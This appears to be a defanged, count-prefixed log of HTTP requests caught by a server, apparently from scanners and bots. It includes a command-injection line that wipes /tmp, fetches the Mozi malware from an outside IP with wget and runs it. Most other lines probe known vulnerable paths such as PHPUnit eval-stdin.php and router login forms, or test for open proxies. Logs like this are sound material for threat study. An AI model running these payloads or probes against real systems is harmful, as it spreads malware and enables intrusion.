1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]175[.]59[.]139:35555/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /tree? HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf